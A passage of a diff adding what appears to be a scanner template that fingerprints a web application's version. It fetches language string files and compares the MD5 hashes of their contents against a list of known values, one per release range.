+ - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"efff104ad59b36fa530bcfb3dab944e3\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"322baadf6a6622334c7879c1e214e8c2\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"00b2a54365d64b2fc2e2a97a48b2ef68\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"d6058a8dda4ad208f948dcb295be4b4a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.23.1 + dsl: + - "(\"c484cc59961576c29a7cc1c0839dd7e1\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"1f84f487ea23e52920b29802baf3491e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"12e069b4093823dce5a0bf5c112b1215\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"3a8b890a61450a4a94c971e392c44a87\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"cbcb2fcb695b421a79c55645051f96d8\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5706f644a74b9a1038c0c099cc43af34\" == md5(body))" + - type: dsl + 
name: 2.0.0 - 2.0.1 + dsl: + - "(\"916b5e915f815a0af870ebd14ad824cb\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f21b3af1735926215fe97a9cf20b2297\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"ce858913ba8dcf270635848c46823efe\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6a2beb4b9de369d46581730810a3d9e2\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"495ca66da94715cce50d313ce907a66d\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e0968be49788f1c3f577a2c4fe3b215a\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e3b88a3e3962fb9a3dca88410afb06d7\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"549196844a7e367e2f48fa7226449261\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c4a55823efb66e81859fb06a2bc643c9\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"591994e232d486d6d908ffc79652c151\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"c00508273829b7731be32e32ec3103b3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"5e680b1f882f3ca749b836e24b52cd9e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"a61d9c413aca820939e0af073f66754f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"17306fbe7e51a506a07e5827f8507c89\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"caf7ee36c6c70a8db56087969402c857\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6284d82408e33394cd96a5ff8ee3b40b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"18834cbc6252f76be840368d8b76237d\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1b4d5f470f93683a4242a0858c00a2a8\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"d8484f988d8c98bb0f73c4484b45fbe8\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"fbe5a4485ba63a27b31c99eb9a14a9d9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - 
"(\"8df7b4a5b40c7d430ef8d613de39504f\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"ea6f113b57fbece3917aac68a5a4f41c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d3445626a3a4ee228273ccd63316614c\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"f6a5236d49e53677e68dc43488a4c0bf\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"1da1a1d1647a119a2845a1b1bcbb8a28\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"15f26c89a3ea8019e900ef66f26508df\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"2270233c0b537b5f487f7f8a4894f1c9\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"239526ecb5104f2469dafe5567ea066e\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"d649436c4706cc302d752d4f937cce2d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"54c77cee02b9b0d9ebe73fd1ceba1313\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"8631a2b8103deeb1822e0adc63588f92\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"e32a0c7fb995eaf6c7e2c624491691a6\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"7968c3bff1d0dfcb99824f542f4348d4\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"bfa23a7815cc889be5f911f6efb81352\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"170e6b3c8d847084f1c4ffbcbf7f95fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5ec9b8ad98834cf240ea96794e0704e2\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"505b50e91800a09c2266da2554febef4\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"39cd9612fae1b1eea4cde45f36a6e4ce\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.3.3 + dsl: + - "(\"c79200bacb1a4bfd188bf83e9e8e177c\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + 
dsl: + - "(\"47b3c29637adf11528094c97a872bd35\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"3add2e721a68106ad843d52f19248c34\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"75cad2587222e5c341b4daa68c1bba09\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"75f53a01f2e5c06fff9810e0264c57ae\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"bc05fc3657829baefaf48359ceeaf864\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"a66c0c371b9f3794eaa73f2294490ecc\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"69f6b0b9c817a16d7d17f34764251f17\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a25b09149887009a4239bd11aab865e6\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"cae9cde4f8a88eb905f846903835d476\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"24d912b567e3f85968ad580f07a3087a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"fc013ecc8fbcb8fd6c4b83cdcccb9a15\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"71629cc8922b25fac920018c1d5a6d3f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"267f04cbe42b44b3ce07757fdbfa2a13\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"cf6f5b174bf1f542983d0f7d153d2f21\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"f6a29964ec24ec0fe2f3ff427605c4c7\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5cfd01f60abf0f0dea0f0048f8b498e0\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"257a6fd7b4aaa72bca4ac44e7b2d8372\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"61e4aada319a21e27bc1d8afe36b9416\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"1732301249745f61cea291a75781de34\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"ee3a0c9c45808c1420ac6fcd351f9259\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - 
"(\"cce726bb55159826ae3cf84fc30ea93e\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"3e3a8069289580108da689b393e5b0cb\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2417811f8c30e4fa5b2199aeeb9babfb\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"663f41333b64d2f957d3f6a98524d405\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"f8fc7c9af0d69591fd7c2f70a927b730\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"c0c28fcac12904dfd72bf267ee102e3a\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"e78ae5169f4b9b0f7350908a9711d803\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"326627995ea55f23676b0d50d8c7745e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"6d5abcace92b7ed81f197d1462a4a6f8\" == md5(body))" + - type: dsl + name: 2.14.0 + dsl: + - "(\"ca4e5f41f2249c1884a56af7dc217be5\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"4c88abc4f10bcd42d87daabd0ab7b03c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"b168af72616c18d958cd1659bfbd88ec\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"add0260f15bf5b2963dd23dd90e03043\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"b9761adb1ab2d3b1fdefbca35c85d910\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"0df3dcd3412bccf578fb36785dc4486f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"38ec02b387142d64e426ba2609564d47\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"3820343fe9fcc4951fa6db1ae3f3597d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"672d4370ec2be2d46a8336f75fe739c8\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.5.2 + dsl: + - "(\"2d95da964aea2f1495ad21aca60dc214\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - 
"(\"eebf38403bdb9153dd7b10ab1c9e0ea7\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"ad7e114c4a9c6fc5177fd6c192a39949\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"8984cc08f61a41eb36f0ef3f353c020a\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"a716f5bf32db20e340dd28ae03e137a1\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b1c1b65c71a013c3cb4e31bd483efda2\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"f54be642723bd360c94546fc8b4c3c4b\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"6ef2ac45da084c444ad6c5471434c93a\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d8014728f9f3797fa31be2c9329c187c\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"bd8e40691fdd7a446ba4237cd8d4ef23\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"8766ee6314561ea40b71b67a485faf1e\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ebb9c816b4838e97e931cbdf1ae60993\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"a8ca070b61f5cf63efbebf2b89aebef2\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5440b267282fb77c1a78a4b5ded2c5e2\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"be589499051adb652ed55e0beb9d7121\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"3006dce72e168a4a4f9a13e3004d6b47\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"4e41cb4f05784d640aee87dabec16130\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2a6c83fd77fa12a450d541b7fff2d22a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"f5cca03bf3297288fef24c1652e23b6d\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a8edf532c1a5c2d6199b1e022bd476bf\" == md5(body))" + - type: dsl + name: 1.1.9 + dsl: + - "(\"86a96458a3dda1b8f4d429e15f400f15\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.8 + dsl: + - "(\"5b4723bd172a2d13f6f949fe705a25e7\" == 
md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"fde79b380b80638cf6a8bfd930f59e0c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"ec4b559c7e6fbe301bcce5d982528510\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"29bbf76e0b7a263b6031139efcfb3049\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f72a0580a5d2cf8613dd45594580074b\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"35c15d494242e77baf5f6e91ee356684\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"b412216e454f7b9cf09d83ee1e4f1904\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"6ebec1c0863c7d79a7b6ef7b5cae8d03\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"025eea7ac7231b10ebd1e40428b80dc7\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"4ac138e5eea1feab360c734e92b2413a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"a7b7ba49ebf41a0e084b8af97d37fb30\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"477da0b3a628513ebb9c53d5f301c05c\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.18.1 + dsl: + - "(\"a21717cfa1a4950f3dcf06ac8236857e\" == md5(body))" + - type: dsl + name: 2.19.0 - 2.19.1 + dsl: + - "(\"b8a5a027f632b562092ae65ae49bf800\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"17cde0577202eede053f626dad94cb3c\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"8e1ba1f3f210b6f63f1c48f5cad13c3f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"9004ce1e91544179e53da531f82ca778\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"5bf6333575f8523c5a5be970fabe4a8b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.7.1 + dsl: + - "(\"0c1472e8a35c1f84306551bde35cc500\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - 
"(\"539f7011bb6d1be40522a52ba2e48532\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"614d120ab9f4507ce5265db072b0abdd\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"8e65bfd2e844855c9cb2e1af789d348b\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"4bb5cbab933dd39016e7b18077aa18f7\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"b500e9fd11b73253fd524c347e6901c8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"ea6e19648dbd193bd1963e151850781c\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"68cfed0357f7783e6aea7324cd7c0448\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e3033f79cb35af3f4a062f4c7e80f60e\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"aff5413579f1b98eb114616867b355dc\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e111e02b746bcf3df8f36c0e130c5be0\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"0c7b6844c2f338489e5736ecff3371a1\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b36a340763c0089281c74c0cfdc9591e\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"915044f20851a9a077840b2c648b18e6\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"ec64e4a1895b78c651fd8eb0b7ee5eca\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"1b75b9b356fa2eca9ddeb5a5aa242514\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"f014c77b8d7866d690fb70608322f4d6\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"2e7e946eca0a1c234543d80d267de173\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"c97578c9c5173151d119a9d2b972627c\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"e98621bc010af50236ce221ddebf3dd2\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6d8d7b3d34bb1089b912535622bc7552\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"1e5d57b2b4746ee2e9001e99b86f3f53\" == md5(body))" + - 
type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"be42e87196a9393c8106f609a370e6c6\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"5a334eb590aa4ac99d99598c5d58ee62\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"e0c8ff61082ce9125dfddabef0e05efd\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"849c5d98c851549baa61952a7a0db175\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"44005a8938df5049e9cfa67550086416\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.10.1 + dsl: + - "(\"07fae5faf67af19dec752f42115823ba\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c721e997b8f2fe5e1de6f025fc8438c5\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"aa72b0a718f956cadbcd97380ec46b1d\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"402048dc5daa86b3801f702cffe3ec5c\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"1ae9d03e4a2d0253832b7a816176e4e7\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"5fb0f13259674f70b52e0306dd530464\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"7e42d67c7ecfec73a376c8e1fc1bcd5b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"316c3f103504e88490cda0cddda2a17d\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"d91862bb4fe47a480ecab7a60dd86574\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"1da8f215b239fbea25f80bb586ca131e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"53b9b2bbdcf6ccadb6becf8b94a06264\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"c9910487db266c3fb11251bb62f5fcaa\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_galician.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"d1b6a952bf05974a0130f0fe3fb827a5\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"410c84484ef3d42af4dff78e5542b1f9\" 
== md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"b9519587a8c98b17cfaf3578d1aec82c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"9a513557e75e26cdf0e07aaf84b16c0b\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"8f651a595a355ad78a55a04dd5369cfa\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"b230b852bf43d67db5a74ad30216fdce\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"15ddecdfa8a470e31326030b1b8badd6\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"f83eb64a101661a56a2850b5d7ae82be\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"ca589d356a8ce8d5a6d903e965dadea0\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"3f2cd8f49228bdd86d1933e0c409e9a5\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e1cb233c7b50918782c2887fef0c83aa\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.6 + dsl: + - "(\"3f0db078ebe6a981030a3ea78d6b14fe\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"e59849894ffc8db9fa4c10a3d3a16078\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"b889b44168b6dac015b1bf882d96d75a\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"c396bebc30c690f9f3d2492ea9331136\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"c38dc6a28682f0f8be4b0d794062b560\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3f4870252793dd4ad4ee7de5aed4100b\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"27b44334d321a6dcf2dfcb4bc54b9594\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"9409aae891162d709a40b687374d54c0\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"35865a638ffd0fd371928505cf098237\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"93b4ed9000f7ba7ea919f42a8a4fe567\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"34ae9664e46e726e10dfbea266710521\" == md5(body))" + - type: dsl + 
name: 1.2.1 + dsl: + - "(\"1843bfb295a13ad78aba6bef0bc3159a\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"a08988c8e39a164b833853098595b4b7\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"8e34a421cefb5b133215e3af42d74607\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"6a67e1ce4630ab05c14b981662678346\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"c155baec9b3626cb367b94ef74267189\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"2f13ac23a778a6719b1993f0e59179ad\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"8f256005f38ce683d3b0e9da97a1f396\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"ce279b6a04687bf6a29f186d81fc4bae\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"9eed482682bc657018d25558e6590ef9\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"d2ee333b710ad01cb92b50c5a93d128c\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"8cacf3544ca80c05c53a6d352db2903d\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"b2fd00f33728b26b400188252f668b81\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.2.0 - 2.9.1 + dsl: + - "(\"7d8dfb7d51f0c477fdbe0115688b42c3\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"526673b481c154afccdc051d6f4663b5\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"e4eaee55e95f35a73c67729cc0818818\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"f9b2cc084aa49d4867407d7e3202f8ee\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"9fc95d8da5cf01692d8efc0f775fcf23\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"a3ac7a1f696a29bccc8c29aba832b3d4\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"a632cff2f830de441cc49f8fb802249d\" == md5(body))" + - 
type: dsl + name: 1.2.4 + dsl: + - "(\"44122e4a3c3b5c3ae6eb77a9bb0de36a\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"cd19c9715b1dfdae59448d48b0e47d85\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"988e009ab3ef82b5f2e73d85202a3412\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"cbf8b853aea23740f6cf475724171259\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"42bca0e12fbe37dee62e17e1b5eb167c\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"c9c796667adac74370bbe953e89e37da\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"6d34aa361df335ce328be1d1df3b7fd4\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d9db365d3332d44f0be1de0d04e251cf\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"d65d81fc67bcbb774bc082744bc0ad00\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"9df514454247fca115fd512254a87d0c\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"51b5bda290313fe8c7aeb187151c7d8c\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"82dcb3247322cce75caab51e850ee027\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"6fdbc9b6ca0fa4d351a2edf236a08dcf\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"537b0826c241681cdeabd5e62ef09fc7\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"2bf313f42df764f410b1221ea04cb1a0\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"c3c1dd9e4771e16629de33fc369cc174\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"52702c9cd16eacdac074fc042b18e852\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"ce6ac63ceac2a3ac98d8530877367a7c\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"9aec8fb8df24e1cd5de6c6c818ec6c6a\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"92cd6d9b4122048e2d3b63154ec34dbf\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 
